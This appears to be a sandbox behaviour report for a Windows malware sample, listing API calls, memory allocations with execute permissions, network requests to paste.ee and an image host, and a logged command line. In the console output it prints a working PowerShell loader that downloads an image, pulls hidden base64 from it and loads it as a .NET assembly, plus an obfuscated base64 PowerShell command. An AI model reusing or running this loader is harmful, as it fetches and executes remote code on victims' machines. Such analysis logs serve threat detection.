WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: At line:1 char:240
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: ring <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: sa' , 'de' , 'cu'))
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: At line:1 char:346
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: ring($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000027f
1 1 0

WriteConsoleW

 buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x0000028b
1 1 0

WriteConsoleW

 buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4fd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f4918
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5398
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5698
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f5458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f54d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003f54d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ce690
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ce710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ce710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005ce710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005cef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://paste.ee/d/hgAnq
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02470000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02470000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2132
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2132
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02471000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02472000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02523000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02524000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02582000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02526000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02583000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02584000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02585000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02586000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02587000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02588000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02589000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2132
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JShUWCcUzBkdIBpShUWCcUzBkdIG0ShUWCcUzBkdIYQBnShUWCcUzBkdIGUShUWCcUzBkdIVQByShUWCcUzBkdIGwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBoShUWCcUzBkdIHQShUWCcUzBkdIdShUWCcUzBkdIBwShUWCcUzBkdIHMShUWCcUzBkdIOgShUWCcUzBkdIvShUWCcUzBkdIC8ShUWCcUzBkdIdQBwShUWCcUzBkdIGwShUWCcUzBkdIbwBhShUWCcUzBkdIGQShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBuShUWCcUzBkdIHMShUWCcUzBkdILgBjShUWCcUzBkdIG8ShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIGIShUWCcUzBkdIcgShUWCcUzBkdIvShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBzShUWCcUzBkdIC8ShUWCcUzBkdIMShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdIDQShUWCcUzBkdILwShUWCcUzBkdI2ShUWCcUzBkdIDMShUWCcUzBkdINShUWCcUzBkdIShUWCcUzBkdIvShUWCcUzBkdIDYShUWCcUzBkdINwShUWCcUzBkdI2ShUWCcUzBkdIC8ShUWCcUzBkdIbwByShUWCcUzBkdIGkShUWCcUzBkdIZwBpShUWCcUzBkdIG4ShUWCcUzBkdIYQBsShUWCcUzBkdIC8ShUWCcUzBkdIcgB1ShUWCcUzBkdIG0ShUWCcUzBkdIcShUWCcUzBkdIBlShUWCcUzBkdIC4ShUWCcUzBkdIagBwShUWCcUzBkdIGcShUWCcUzBkdIPwShUWCcUzBkdIxShUWCcUzBkdIDYShUWCcUzBkdIOQShUWCcUzBkdI3ShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdINQShUWCcUzBkdIzShUWCcUzBkdIDUShUWCcUzBkdIMgShUWCcUzBkdI5ShUWCcUzBkdICcShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHcShUWCcUzBkdIZQBiShUWCcUzBkdIEMShUWCcUzBkdIbShUWCcUzBkdIBpShUWCcUzBkdIGUShUWCcUzBkdIbgB0ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdIE4ShUWCcUzBkdIZQB3ShUWCcUzBkdIC0ShUWCcUzBkdITwBiShUWCcUzBkdIGoShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIE4ShUWCcUz